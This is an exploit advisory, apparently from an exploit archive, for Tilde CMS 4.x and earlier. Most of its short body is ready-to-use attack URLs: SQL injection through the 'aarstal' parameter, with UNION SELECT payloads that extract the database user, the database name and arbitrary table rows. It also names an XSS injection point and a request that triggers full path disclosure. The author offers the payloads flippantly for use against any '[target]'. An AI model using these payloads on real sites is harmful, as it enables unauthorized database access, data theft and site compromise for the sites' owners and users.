|
---------------------------------------------------------------=0D
____ __________ __ ____ __ =0D
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ =0D
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\=0D
| | | \ | |/ \ \___| | /_____/ | || | =0D
|___|___| /\__| /______ /\___ >__| |___||__| =0D
\/\______| \/ \/ =0D
---------------------------------------------------------------=0D
=0D
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org =0D
=0D
---------------------------------------------------------------=0D
=0D
Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection=0D
=0D
---------------------------------------------------------------=0D
=0D
#By KiNgOfThEwOrLd =0D
=0D
---------------------------------------------------------------=0D
PoC=0D
=0D
D'u need an explanation?!? i don't think so :P=0D
---------------------------------------------------------------=0D
SQL Injection=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27=0D
=0D
Little examples=0D
=0D
Using user() and database() functions u can get some informations about the database...as:=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*=0D
=0D
Or u can get some recordes by the database like:=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*=0D
=0D
D'u want the tables n' the rows? Find it yourself ;P=0D
---------------------------------------------------------------=0D
something else..=0D
=0D
Xss Vulnerability=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]=0D
---------------------------------------------------------------=0D
Full Path Disclosure=0D
=0D
http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on=0D
---------------------------------------------------------------=0D